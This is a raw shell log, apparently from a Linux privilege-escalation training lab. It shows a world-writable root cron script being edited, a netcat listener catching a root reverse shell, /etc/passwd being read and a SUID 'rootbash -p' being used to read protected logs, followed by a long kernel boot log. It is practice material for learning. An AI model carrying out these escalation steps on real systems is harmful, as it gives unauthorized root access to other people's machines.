736* * * * * root overwrite.sh
737* * * * * root /usr/local/bin/compress.sh
738
739user@debian:~/tools/mysql-udf$ locate overwrite.sh
740locate: warning: database `/var/cache/locate/locatedb' is more than 8 days old (actual age is 247.7 days)
741/usr/local/bin/overwrite.sh
742user@debian:~/tools/mysql-udf$ ls -l /usr/local/bin/overwrite.sh
743-rwxr--rw- 1 root staff 40 May 13 2017 /usr/local/bin/overwrite.sh
744user@debian:~/tools/mysql-udf$ cd /usr/local/bin/
745user@debian:/usr/local/bin$ ls
746compress.sh overwrite.sh suid-env suid-env2 suid-so
747user@debian:/usr/local/bin$ cat overwrite.sh
748#!/bin/bash
749
750echo `date` > /tmp/useless
751user@debian:/usr/local/bin$ nano overwrite.sh
752user@debian:/usr/local/bin$ nc -nvlp 4444
753listening on [any] 4444 ...
754connect to [10.10.170.166] from (UNKNOWN) [10.10.170.166] 37728
755allexport off
756braceexpand on
757emacs on
758errexit off
759errtrace off
760functrace off
761hashall on
762histexpand on
763history on
764ignoreeof off
765interactive-comments on
766keyword off
767monitor off
768noclobber off
769noexec off
770noglob off
771nolog off
772notify off
773nounset off
774onecmd off
775physical off
776pipefail off
777posix off
778privileged off
779verbose off
780vi off
781xtrace off
782id
783uid=0(root) gid=0(root) groups=0(root)
784ls
785cat /etc/passwd
786root:x:0:0:root:/root:/bin/bash
787daemon:x:1:1:daemon:/usr/sbin:/bin/sh
788bin:x:2:2:bin:/bin:/bin/sh
789sys:x:3:3:sys:/dev:/bin/sh
790sync:x:4:65534:sync:/bin:/bin/sync
791games:x:5:60:games:/usr/games:/bin/sh
792man:x:6:12:man:/var/cache/man:/bin/sh
793lp:x:7:7:lp:/var/spool/lpd:/bin/sh
794mail:x:8:8:mail:/var/mail:/bin/sh
795news:x:9:9:news:/var/spool/news:/bin/sh
796uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
797proxy:x:13:13:proxy:/bin:/bin/sh
798www-data:x:33:33:www-data:/var/www:/bin/sh
799backup:x:34:34:backup:/var/backups:/bin/sh
800list:x:38:38:Mailing List Manager:/var/list:/bin/sh
801irc:x:39:39:ircd:/var/run/ircd:/bin/sh
802gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
803nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
804libuuid:x:100:101::/var/lib/libuuid:/bin/sh
805Debian-exim:x:101:103::/var/spool/exim4:/bin/false
806sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
807user:x:1000:1000:user,,,:/home/user:/bin/bash
808statd:x:103:65534::/var/lib/nfs:/bin/false
809mysql:x:104:106:MySQL Server,,,:/var/lib/mysql:/bin/false
810bmillakid:x:1001:1001::/home/bmillakid:/bin/sh
811user@debian:/usr/local/bin$
812
813login as: user
814user@10.10.170.166's password:
815Linux debian 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC 2014 x86_64
816
817The programs included with the Debian GNU/Linux system are free software;
818the exact distribution terms for each program are described in the
819individual files in /usr/share/doc/*/copyright.
820
821Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
822permitted by applicable law.
823Last login: Sun Jan 17 21:14:02 2021 from ip-10-9-252-16.eu-west-1.compute.internal
824user@debian:~$ dmesg | grep /var/log/messages > l33t.txt
825user@debian:~$ cat l33t.txt
826user@debian:~$ ls
827l33t.txt myvpn.ovpn tools
828user@debian:~$ cat l33t.txt
829user@debian:~$ ls
830l33t.txt myvpn.ovpn tools
831user@debian:~$ dmesg | grep /var/log/messages
832user@debian:~$ tail -f /var/log/messages
833tail: cannot open `/var/log/messages' for reading: Permission denied
834user@debian:~$ tail -f /var/log/messages | less
835user@debian:~$ tail -f /var/log/auth.log
836tail: cannot open `/var/log/auth.log' for reading: Permission denied
837user@debian:~$ /tmp/rootbash -p
838rootbash-4.1# tail -f /var/log/messages
839Jan 17 19:55:44 debian kernel: [ 116.943577] RPC: Registered tcp transport module.
840Jan 17 19:55:44 debian kernel: [ 116.943578] RPC: Registered tcp NFSv4.1 backchannel transport module.
841Jan 17 19:55:44 debian kernel: [ 117.026375] Slow work thread pool: Starting up
842Jan 17 19:55:44 debian kernel: [ 117.026397] Slow work thread pool: Ready
843Jan 17 19:55:44 debian kernel: [ 117.026419] FS-Cache: Loaded
844Jan 17 19:55:44 debian kernel: [ 117.201005] FS-Cache: Netfs 'nfs' registered for caching
845Jan 17 19:55:44 debian kernel: [ 117.326456] Installing knfsd (copyright (C) 1996 okir@monad.swb.de).
846Jan 17 19:55:48 debian kernel: [ 130.271583] svc: failed to register lockdv1 RPC service (errno 97).
847Jan 17 19:55:48 debian kernel: [ 130.272088] NFSD: Using /var/lib/nfs/v4recovery as the NFSv4 state recovery directory
848Jan 17 19:55:48 debian kernel: [ 130.272101] NFSD: starting 90-second grace period
854ls
855^C
856rootbash-4.1# cat /var/log/messages
857May 15 06:25:03 debian rsyslogd: [origin software="rsyslogd" swVersion="4.6.4" x-pid="1345" x-info="http://www.rsyslog.com"] rsyslogd was HUPed, type 'lightweight'.
858May 15 11:32:35 debian kernel: imklog 4.6.4, log source = /proc/kmsg started.
859May 15 11:32:35 debian rsyslogd: [origin software="rsyslogd" swVersion="4.6.4" x-pid="1418" x-info="http://www.rsyslog.com"] (re)start
860May 15 11:32:35 debian kernel: [ 0.000000] Initializing cgroup subsys cpuset
861May 15 11:32:35 debian kernel: [ 0.000000] Initializing cgroup subsys cpu
862May 15 11:32:35 debian kernel: [ 0.000000] Linux version 2.6.32-5-amd64 (Debian 2.6.32-48squeeze6) (jmm@debian.org) (gcc version 4.3.5 (Debian 4.3.5-4) ) #1 SMP Tue May 13 16:34:35 UTC 2014
863May 15 11:32:35 debian kernel: [ 0.000000] Command line: BOOT_IMAGE=/boot/vmlinuz-2.6.32-5-amd64 root=UUID=be5bb36f-7bb4-4900-b459-196278f714b6 ro quiet console=ttyS0
864May 15 11:32:35 debian kernel: [ 0.000000] KERNEL supported cpus:
865May 15 11:32:35 debian kernel: [ 0.000000] Intel GenuineIntel
866May 15 11:32:35 debian kernel: [ 0.000000] AMD AuthenticAMD
867May 15 11:32:35 debian kernel: [ 0.000000] Centaur CentaurHauls
868May 15 11:32:35 debian kernel: [ 0.000000] BIOS-provided physical RAM map:
869May 15 11:32:35 debian kernel: [ 0.000000] BIOS-e820: 0000000000000000 - 000000000009e000 (usable)
870May 15 11:32:35 debian kernel: [ 0.000000] BIOS-e820: 000000000009e000 - 00000000000a0000 (reserved)
871May 15 11:32:35 debian kernel: [ 0.000000] BIOS-e820: 00000000000e0000 - 0000000000100000 (reserved)
872May 15 11:32:35 debian kernel: [ 0.000000] BIOS-e820: 0000000000100000 - 00000000f0000000 (usable)
873May 15 11:32:35 debian kernel: [ 0.000000] BIOS-e820: 00000000fc000000 - 0000000100000000 (reserved)
874May 15 11:32:35 debian kernel: [ 0.000000] BIOS-e820: 0000000100000000 - 00000003d0000000 (usable)
875May 15 11:32:35 debian kernel: [ 0.000000] DMI 2.7 present.
876May 15 11:32:35 debian kernel: [ 0.000000] last_pfn = 0x3d0000 max_arch_pfn = 0x400000000
877May 15 11:32:35 debian kernel: [ 0.000000] x86 PAT enabled: cpu 0, old 0x7040600070406, new 0x7010600070106
878May 15 11:32:35 debian kernel: [ 0.000000] last_pfn = 0xf0000 max_arch_pfn = 0x400000000
879May 15 11:32:35 debian kernel: [ 0.000000] init_memory_mapping: 0000000000000000-00000000f0000000
880May 15 11:32:35 debian kernel: [ 0.000000] init_memory_mapping: 0000000100000000-00000003d0000000
881May 15 11:32:35 debian kernel: [ 0.000000] RAMDISK: 37709000 - 37fefa59
882May 15 11:32:35 debian kernel: [ 0.000000] ACPI: RSDP 00000000000ea020 00024 (v02 Xen)
883May 15 11:32:35 debian kernel: [ 0.000000] ACPI: XSDT 00000000fc00e2a0 00054 (v01 Xen HVM 00000000 HVML 00000000)
884May 15 11:32:35 debian kernel: [ 0.000000] ACPI: FACP 00000000fc00df60 000F4 (v04 Xen HVM 00000000 HVML 00000000)
885May 15 11:32:35 debian kernel: [ 0.000000] ACPI: DSDT 00000000fc0021c0 0BD19 (v02 Xen HVM 00000000 INTL 20090123)
886May 15 11:32:35 debian kernel: [ 0.000000] ACPI: FACS 00000000fc002180 00040
887May 15 11:32:35 debian kernel: [ 0.000000] ACPI: APIC 00000000fc00e060 000D8 (v02 Xen HVM 00000000 HVML 00000000)
888May 15 11:32:35 debian kernel: [ 0.000000] ACPI: HPET 00000000fc00e1b0 00038 (v01 Xen HVM 00000000 HVML 00000000)
889May 15 11:32:35 debian kernel: [ 0.000000] ACPI: WAET 00000000fc00e1f0 00028 (v01 Xen HVM 00000000 HVML 00000000)
890May 15 11:32:35 debian kernel: [ 0.000000] ACPI: SSDT 00000000fc00e220 00031 (v02 Xen HVM 00000000 INTL 20090123)
891May 15 11:32:35 debian kernel: [ 0.000000] ACPI: SSDT 00000000fc00e260 00033 (v02 Xen HVM 00000000 INTL 20090123)
892May 15 11:32:35 debian kernel: [ 0.000000] No NUMA configuration found
893May 15 11:32:35 debian kernel: [ 0.000000] Faking a node at 0000000000000000-00000003d0000000
894May 15 11:32:35 debian kernel: [ 0.000000] Bootmem setup node 0 0000000000000000-00000003d0000000
895May 15 11:32:35 debian kernel: [ 0.000000] NODE_DATA [0000000000017000 - 000000000001efff]
896May 15 11:32:35 debian kernel: [ 0.000000] bootmap [000000000001f000 - 0000000000098fff] pages 7a
897May 15 11:32:35 debian kernel: [ 0.000000] (8 early reservations) ==> bootmem [0000000000 - 03d0000000]
898May 15 11:32:35 debian kernel: [ 0.000000] #0 [0000000000 - 0000001000] BIOS data page ==> [0000000000 - 0000001000]
899May 15 11:32:35 debian kernel: [ 0.000000] #1 [0000006000 - 0000008000] TRAMPOLINE ==> [0000006000 - 0000008000]
900May 15 11:32:35 debian kernel: [ 0.000000] #2 [0001000000 - 00016d7584] TEXT DATA BSS ==> [0001000000 - 00016d7584]
901May 15 11:32:35 debian kernel: [ 0.000000] #3 [0037709000 - 0037fefa59] RAMDISK ==> [0037709000 - 0037fefa59]
902May 15 11:32:35 debian kernel: [ 0.000000] #4 [000009e000 - 0000100000] BIOS reserved ==> [000009e000 - 0000100000]
903May 15 11:32:35 debian kernel: [ 0.000000] #5 [00016d8000 - 00016d80c8] BRK ==> [00016d8000 - 00016d80c8]
904May 15 11:32:35 debian kernel: [ 0.000000] #6 [0000008000 - 000000b000] PGTABLE ==> [0000008000 - 000000b000]
905May 15 11:32:35 debian kernel: [ 0.000000] #7 [000000b000 - 0000017000] PGTABLE ==> [000000b000 - 0000017000]
906May 15 11:32:35 debian kernel: [ 0.000000] found SMP MP-table at [ffff8800000fbc50] fbc50
907May 15 11:32:35 debian kernel: [ 0.000000] Zone PFN ranges:
908May 15 11:32:35 debian kernel: [ 0.000000] DMA 0x00000000 -> 0x00001000
909May 15 11:32:35 debian kernel: [ 0.000000] DMA32 0x00001000 -> 0x00100000
910May 15 11:32:35 debian kernel: [ 0.000000] Normal 0x00100000 -> 0x003d0000
911May 15 11:32:35 debian kernel: [ 0.000000] Movable zone start PFN for each node
912May 15 11:32:35 debian kernel: [ 0.000000] early_node_map[3] active PFN ranges
913May 15 11:32:35 debian kernel: [ 0.000000] 0: 0x00000000 -> 0x0000009e
914May 15 11:32:35 debian kernel: [ 0.000000] 0: 0x00000100 -> 0x000f0000
915May 15 11:32:35 debian kernel: [ 0.000000] 0: 0x00100000 -> 0x003d0000
916May 15 11:32:35 debian kernel: [ 0.000000] ACPI: PM-Timer IO Port: 0xb008
917May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x00] lapic_id[0x00] enabled)
918May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x01] lapic_id[0x02] enabled)
919May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x02] lapic_id[0x01] enabled)
920May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x03] lapic_id[0x03] enabled)
921May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x04] lapic_id[0x00] disabled)
922May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x05] lapic_id[0x00] disabled)
923May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x06] lapic_id[0x00] disabled)
924May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x07] lapic_id[0x00] disabled)
925May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x08] lapic_id[0x00] disabled)
926May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x09] lapic_id[0x00] disabled)
927May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0a] lapic_id[0x00] disabled)
928May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0b] lapic_id[0x00] disabled)
929May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0c] lapic_id[0x00] disabled)
930May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0d] lapic_id[0x00] disabled)
931May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0e] lapic_id[0x00] disabled)
932May 15 11:32:35 debian kernel: [ 0.000000] ACPI: IOAPIC (id[0x01] address[0xfec00000] gsi_base[0])
933May 15 11:32:35 debian kernel: [ 0.000000] IOAPIC[0]: apic_id 1, version 17, address 0xfec00000, GSI 0-47
934May 15 11:32:35 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl)
935May 15 11:32:35 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 5 global_irq 5 low level)
936May 15 11:32:35 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 10 global_irq 10 low level)
937May 15 11:32:35 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 11 global_irq 11 low level)
938May 15 11:32:35 debian kernel: [ 0.000000] Using ACPI (MADT) for SMP configuration information
939May 15 11:32:35 debian kernel: [ 0.000000] ACPI: HPET id: 0x8086a201 base: 0xfed00000
940May 15 11:32:35 debian kernel: [ 0.000000] SMP: Allowing 15 CPUs, 11 hotplug CPUs
941May 15 11:32:35 debian kernel: [ 0.000000] Xen version 4.2.
942May 15 11:32:35 debian kernel: [ 0.000000] Netfront and the Xen platform PCI driver have been compiled for this kernel: unplug emulated NICs.
943May 15 11:32:35 debian kernel: [ 0.000000] Blkfront and the Xen platform PCI driver have been compiled for this kernel: unplug emulated disks.
944May 15 11:32:35 debian kernel: [ 0.000000] You might have to change the root device
945May 15 11:32:35 debian kernel: [ 0.000000] from /dev/hd[a-d] to /dev/xvd[a-d]
946May 15 11:32:35 debian kernel: [ 0.000000] in your root= kernel command line option
947May 15 11:32:35 debian kernel: [ 0.000000] PM: Registered nosave memory: 000000000009e000 - 00000000000a0000
948May 15 11:32:35 debian kernel: [ 0.000000] PM: Registered nosave memory: 00000000000a0000 - 00000000000e0000
949May 15 11:32:35 debian kernel: [ 0.000000] PM: Registered nosave memory: 00000000000e0000 - 0000000000100000
950May 15 11:32:35 debian kernel: [ 0.000000] PM: Registered nosave memory: 00000000f0000000 - 00000000fc000000
951May 15 11:32:35 debian kernel: [ 0.000000] PM: Registered nosave memory: 00000000fc000000 - 0000000100000000
952May 15 11:32:35 debian kernel: [ 0.000000] Allocating PCI resources starting at f0000000 (gap: f0000000:c000000)
953May 15 11:32:35 debian kernel: [ 0.000000] Booting paravirtualized kernel on Xen
954May 15 11:32:35 debian kernel: [ 0.000000] NR_CPUS:512 nr_cpumask_bits:512 nr_cpu_ids:15 nr_node_ids:1
955May 15 11:32:35 debian kernel: [ 0.000000] PERCPU: Embedded 30 pages/cpu @ffff88000ee00000 s90392 r8192 d24296 u131072
956May 15 11:32:35 debian kernel: [ 0.000000] pcpu-alloc: s90392 r8192 d24296 u131072 alloc=1*2097152
957May 15 11:32:35 debian kernel: [ 0.000000] pcpu-alloc: [0] 00 01 02 03 04 05 06 07 08 09 10 11 12 13 14 --
958May 15 11:32:35 debian kernel: [ 0.000000] Built 1 zonelists in Zone order, mobility grouping on. Total pages: 3877290
959May 15 11:32:35 debian kernel: [ 0.000000] Policy zone: Normal
960May 15 11:32:35 debian kernel: [ 0.000000] Kernel command line: BOOT_IMAGE=/boot/vmlinuz-2.6.32-5-amd64 root=UUID=be5bb36f-7bb4-4900-b459-196278f714b6 ro quiet console=ttyS0
961May 15 11:32:35 debian kernel: [ 0.000000] PID hash table entries: 4096 (order: 3, 32768 bytes)
962May 15 11:32:35 debian kernel: [ 0.000000] Initializing CPU#0
963May 15 11:32:35 debian kernel: [ 0.000000] xsave/xrstor: enabled xstate_bv 0x7, cntxt size 0x340
964May 15 11:32:35 debian kernel: [ 0.000000] Checking aperture...
965May 15 11:32:35 debian kernel: [ 0.000000] No AGP bridge found
966May 15 11:32:35 debian kernel: [ 0.000000] PCI-DMA: Using software bounce buffering for IO (SWIOTLB)
967May 15 11:32:35 debian kernel: [ 0.000000] Placing 64MB software IO TLB between ffff88000efde000 - ffff880012fde000
968May 15 11:32:35 debian kernel: [ 0.000000] software IO TLB at phys 0xefde000 - 0x12fde000
969May 15 11:32:35 debian kernel: [ 0.000000] Memory: 15426784k/15990784k available (3087k kernel code, 262536k absent, 301464k reserved, 2036k data, 592k init)
970May 15 11:32:35 debian kernel: [ 0.000000] SLUB: Genslabs=14, HWalign=64, Order=0-3, MinObjects=0, CPUs=15, Nodes=1
971May 15 11:32:35 debian kernel: [ 0.000000] Hierarchical RCU implementation.
972May 15 11:32:35 debian kernel: [ 0.000000] NR_IRQS:4352 nr_irqs:936
973May 15 11:32:35 debian kernel: [ 0.000000] Xen HVM callback vector for event delivery is enabled
974May 15 11:32:35 debian kernel: [ 0.000000] Console: colour VGA+ 80x25
975May 15 11:32:35 debian kernel: [ 0.000000] console [ttyS0] enabled
976May 15 11:32:35 debian kernel: [ 0.000000] Detected 2500.068 MHz processor.
977May 15 11:32:35 debian kernel: [ 0.008000] Calibrating delay loop (skipped), value calculated using timer frequency.. 5000.13 BogoMIPS (lpj=10000272)
978May 15 11:32:35 debian kernel: [ 0.008000] Security Framework initialized
979May 15 11:32:35 debian kernel: [ 0.008000] SELinux: Disabled at boot.
980May 15 11:32:35 debian kernel: [ 0.008000] Dentry cache hash table entries: 2097152 (order: 12, 16777216 bytes)
981May 15 11:32:35 debian kernel: [ 0.008000] Inode-cache hash table entries: 1048576 (order: 11, 8388608 bytes)
982May 15 11:32:35 debian kernel: [ 0.008000] Mount-cache hash table entries: 256
983May 15 11:32:35 debian kernel: [ 0.008000] Initializing cgroup subsys ns
984May 15 11:32:35 debian kernel: [ 0.008000] Initializing cgroup subsys cpuacct
985May 15 11:32:35 debian kernel: [ 0.008000] Initializing cgroup subsys devices
986May 15 11:32:35 debian kernel: [ 0.008000] Initializing cgroup subsys freezer
987May 15 11:32:35 debian kernel: [ 0.008000] Initializing cgroup subsys net_cls
988May 15 11:32:35 debian kernel: [ 0.008000] CPU: Physical Processor ID: 0
989May 15 11:32:35 debian kernel: [ 0.008000] CPU: L1 I cache: 32K, L1 D cache: 32K
990May 15 11:32:35 debian kernel: [ 0.008000] CPU: L2 cache: 256K
991May 15 11:32:35 debian kernel: [ 0.008000] CPU: L3 cache: 25600K
992May 15 11:32:35 debian kernel: [ 0.008000] CPU 0/0x0 -> Node 0
993May 15 11:32:35 debian kernel: [ 0.008000] mce: CPU supports 2 MCE banks
994May 15 11:32:35 debian kernel: [ 0.008000] Performance Events: unsupported p6 CPU model 62 no PMU driver, software events only.
995May 15 11:32:35 debian kernel: [ 0.009289] ACPI: Core revision 20090903
996May 15 11:32:35 debian kernel: [ 0.012133] Not enabling x2apic, Intr-remapping init failed.
997May 15 11:32:35 debian kernel: [ 0.012135] Setting APIC routing to physical flat
998May 15 11:32:35 debian kernel: [ 0.014214] ..TIMER: vector=0x30 apic1=0 pin1=2 apic2=0 pin2=0
999May 15 11:32:35 debian kernel: [ 0.053966] CPU0: Intel(R) Xeon(R) CPU E5-2670 v2 @ 2.50GHz stepping 04
1000May 15 11:32:35 debian kernel: [ 0.053982] installing Xen timer for CPU 0
1001May 15 11:32:35 debian kernel: [ 0.054162] Booting processor 1 APIC 0x2 ip 0x6000
1002May 15 11:32:35 debian kernel: [ 0.008000] Initializing CPU#1
1003May 15 11:32:35 debian kernel: [ 0.008000] CPU: Physical Processor ID: 0
1004May 15 11:32:35 debian kernel: [ 0.008000] CPU: L1 I cache: 32K, L1 D cache: 32K
1005May 15 11:32:35 debian kernel: [ 0.008000] CPU: L2 cache: 256K
1006May 15 11:32:35 debian kernel: [ 0.008000] CPU: L3 cache: 25600K
1007May 15 11:32:35 debian kernel: [ 0.008000] CPU 1/0x2 -> Node 0
1008May 15 11:32:35 debian kernel: [ 0.140804] CPU1: Intel(R) Xeon(R) CPU E5-2670 v2 @ 2.50GHz stepping 04
1009May 15 11:32:35 debian kernel: [ 0.140859] checking TSC synchronization [CPU#0 -> CPU#1]: passed.
1010May 15 11:32:35 debian kernel: [ 0.144005] installing Xen timer for CPU 1
1011May 15 11:32:35 debian kernel: [ 0.144084] Booting processor 2 APIC 0x1 ip 0x6000
1012May 15 11:32:35 debian kernel: [ 0.008000] Initializing CPU#2
1013May 15 11:32:35 debian kernel: [ 0.008000] CPU: Physical Processor ID: 0
1014May 15 11:32:35 debian kernel: [ 0.008000] CPU: L1 I cache: 32K, L1 D cache: 32K
1015May 15 11:32:35 debian kernel: [ 0.008000] CPU: L2 cache: 256K
1016May 15 11:32:35 debian kernel: [ 0.008000] CPU: L3 cache: 25600K
1017May 15 11:32:35 debian kernel: [ 0.008000] CPU 2/0x1 -> Node 0
1018May 15 11:32:35 debian kernel: [ 0.232868] CPU2: Intel(R) Xeon(R) CPU E5-2670 v2 @ 2.50GHz stepping 04
1019May 15 11:32:35 debian kernel: [ 0.232929] checking TSC synchronization [CPU#0 -> CPU#2]: passed.
1020May 15 11:32:35 debian kernel: [ 0.236007] installing Xen timer for CPU 2
1021May 15 11:32:35 debian kernel: [ 0.236108] Booting processor 3 APIC 0x3 ip 0x6000
1022May 15 11:32:35 debian kernel: [ 0.008000] Initializing CPU#3
1023May 15 11:32:35 debian kernel: [ 0.008000] CPU: Physical Processor ID: 0
1024May 15 11:32:35 debian kernel: [ 0.008000] CPU: L1 I cache: 32K, L1 D cache: 32K
1025May 15 11:32:35 debian kernel: [ 0.008000] CPU: L2 cache: 256K
1026May 15 11:32:35 debian kernel: [ 0.008000] CPU: L3 cache: 25600K
1027May 15 11:32:35 debian kernel: [ 0.008000] CPU 3/0x3 -> Node 0
1028May 15 11:32:35 debian kernel: [ 0.324780] CPU3: Intel(R) Xeon(R) CPU E5-2670 v2 @ 2.50GHz stepping 04
1029May 15 11:32:35 debian kernel: [ 0.324850] checking TSC synchronization [CPU#0 -> CPU#3]: passed.
1030May 15 11:32:35 debian kernel: [ 0.328005] installing Xen timer for CPU 3
1031May 15 11:32:35 debian kernel: [ 0.328025] Brought up 4 CPUs
1032May 15 11:32:35 debian kernel: [ 0.328027] Total of 4 processors activated (20196.33 BogoMIPS).
1033May 15 11:32:35 debian kernel: [ 0.328773] devtmpfs: initialized
1034May 15 11:32:35 debian kernel: [ 0.332061] regulator: core version 0.5
1035May 15 11:32:35 debian kernel: [ 0.332072] NET: Registered protocol family 16
1036May 15 11:32:35 debian kernel: [ 0.332156] ACPI: bus type pci registered
1037May 15 11:32:35 debian kernel: [ 0.332387] PCI: Using configuration type 1 for base access
1038May 15 11:32:35 debian kernel: [ 0.332873] bio: create slab <bio-0> at 0
1039May 15 11:32:35 debian kernel: [ 0.379117] ACPI: Interpreter enabled
1040May 15 11:32:35 debian kernel: [ 0.379119] ACPI: (supports S0 S3 S4 S5)
1041May 15 11:32:35 debian kernel: [ 0.379133] ACPI: Using IOAPIC for interrupt routing
1042May 15 11:32:35 debian kernel: [ 0.457794] ACPI: No dock devices found.
1043May 15 11:32:35 debian kernel: [ 0.457956] ACPI: PCI Root Bridge [PCI0] (0000:00)
1044May 15 11:32:35 debian kernel: [ 0.462736] * Found PM-Timer Bug on the chipset. Due to workarounds for a bug,
1045May 15 11:32:35 debian kernel: [ 0.462737] * this clock source is slow. Consider trying other clock sources
1046May 15 11:32:35 debian kernel: [ 0.463902] pci 0000:00:01.3: quirk: region b000-b03f claimed by PIIX4 ACPI
1047May 15 11:32:35 debian kernel: [ 0.699319] ACPI: PCI Interrupt Link [LNKA] (IRQs *5 10 11)
1048May 15 11:32:35 debian kernel: [ 0.699698] ACPI: PCI Interrupt Link [LNKB] (IRQs 5 *10 11)
1049May 15 11:32:35 debian kernel: [ 0.700019] ACPI: PCI Interrupt Link [LNKC] (IRQs 5 10 *11)
1050May 15 11:32:35 debian kernel: [ 0.700380] ACPI: PCI Interrupt Link [LNKD] (IRQs *5 10 11)
1051May 15 11:32:35 debian kernel: [ 0.700653] vgaarb: device added: PCI:0000:00:02.0,decodes=io+mem,owns=io+mem,locks=none
1052May 15 11:32:35 debian kernel: [ 0.700655] vgaarb: loaded
1053May 15 11:32:35 debian kernel: [ 0.700693] PCI: Using ACPI for IRQ routing
1054May 15 11:32:35 debian kernel: [ 0.700693] HPET: 3 timers in total, 0 timers will be used for per-cpu timer
1055May 15 11:32:35 debian kernel: [ 0.700693] hpet0: at MMIO 0xfed00000, IRQs 2, 8, 0
1056May 15 11:32:35 debian kernel: [ 0.700693] hpet0: 3 comparators, 64-bit 62.500000 MHz counter
1057May 15 11:32:35 debian kernel: [ 0.708028] Switching to clocksource xen
1058May 15 11:32:35 debian kernel: [ 0.709101] pnp: PnP ACPI init
1059May 15 11:32:35 debian kernel: [ 0.709113] ACPI: bus type pnp registered
1060May 15 11:32:35 debian kernel: [ 0.747539] pnp: PnP ACPI: found 12 devices
1061May 15 11:32:35 debian kernel: [ 0.747541] ACPI: ACPI bus type pnp unregistered
1062May 15 11:32:35 debian kernel: [ 0.747551] system 00:00: iomem range 0x0-0x9ffff could not be reserved
1063May 15 11:32:35 debian kernel: [ 0.747557] system 00:03: ioport range 0x8a0-0x8a3 has been reserved
1064May 15 11:32:35 debian kernel: [ 0.747558] system 00:03: ioport range 0xcc0-0xccf has been reserved
1065May 15 11:32:35 debian kernel: [ 0.747560] system 00:03: ioport range 0x4d0-0x4d1 has been reserved
1066May 15 11:32:35 debian kernel: [ 0.747566] system 00:0b: ioport range 0x10c0-0x1141 has been reserved
1067May 15 11:32:35 debian kernel: [ 0.747568] system 00:0b: ioport range 0xb044-0xb047 has been reserved
1068May 15 11:32:35 debian kernel: [ 0.752641] NET: Registered protocol family 2
1069May 15 11:32:35 debian kernel: [ 0.752920] IP route cache hash table entries: 524288 (order: 10, 4194304 bytes)
1070May 15 11:32:35 debian kernel: [ 0.754409] TCP established hash table entries: 524288 (order: 11, 8388608 bytes)
1071May 15 11:32:35 debian kernel: [ 0.755645] TCP bind hash table entries: 65536 (order: 8, 1048576 bytes)
1072May 15 11:32:35 debian kernel: [ 0.755800] TCP: Hash tables configured (established 524288 bind 65536)
1073May 15 11:32:35 debian kernel: [ 0.755801] TCP reno registered
1074May 15 11:32:35 debian kernel: [ 0.755887] NET: Registered protocol family 1
1075May 15 11:32:35 debian kernel: [ 0.755899] pci 0000:00:00.0: Limiting direct PCI/PCI transfers
1076May 15 11:32:35 debian kernel: [ 0.755960] pci 0000:00:01.0: PIIX3: Enabling Passive Release
1077May 15 11:32:35 debian kernel: [ 0.756004] pci 0000:00:01.0: Activating ISA DMA hang workarounds
1078May 15 11:32:35 debian kernel: [ 0.756087] Unpacking initramfs...
1079May 15 11:32:35 debian kernel: [ 0.897823] Freeing initrd memory: 9114k freed
1080May 15 11:32:35 debian kernel: [ 0.900160] audit: initializing netlink socket (disabled)
1081May 15 11:32:35 debian kernel: [ 0.900169] type=2000 audit(1589556748.331:1): initialized
1082May 15 11:32:35 debian kernel: [ 0.903195] HugeTLB registered 2 MB page size, pre-allocated 0 pages
1083May 15 11:32:35 debian kernel: [ 0.904442] VFS: Disk quotas dquot_6.5.2
1084May 15 11:32:35 debian kernel: [ 0.904488] Dquot-cache hash table entries: 512 (order 0, 4096 bytes)
1085May 15 11:32:35 debian kernel: [ 0.904546] msgmni has been set to 30148
1086May 15 11:32:35 debian kernel: [ 0.905183] alg: No test for stdrng (krng)
1087May 15 11:32:35 debian kernel: [ 0.905239] Block layer SCSI generic (bsg) driver version 0.4 loaded (major 253)
1088May 15 11:32:35 debian kernel: [ 0.905241] io scheduler noop registered
1089May 15 11:32:35 debian kernel: [ 0.905242] io scheduler anticipatory registered
1090May 15 11:32:35 debian kernel: [ 0.905243] io scheduler deadline registered
1091May 15 11:32:35 debian kernel: [ 0.905276] io scheduler cfq registered (default)
1092May 15 11:32:35 debian kernel: [ 0.905491] xen-platform-pci 0000:00:03.0: PCI INT A -> GSI 28 (level, low) -> IRQ 28
1093May 15 11:32:35 debian kernel: [ 0.905526] Grant table initialized
1094May 15 11:32:35 debian kernel: [ 0.907463] Linux agpgart interface v0.103
1095May 15 11:32:35 debian kernel: [ 0.907481] Serial: 8250/16550 driver, 4 ports, IRQ sharing enabled
1096May 15 11:32:35 debian kernel: [ 0.908501] serial8250: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A
1097May 15 11:32:35 debian kernel: [ 0.909962] 00:0a: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A
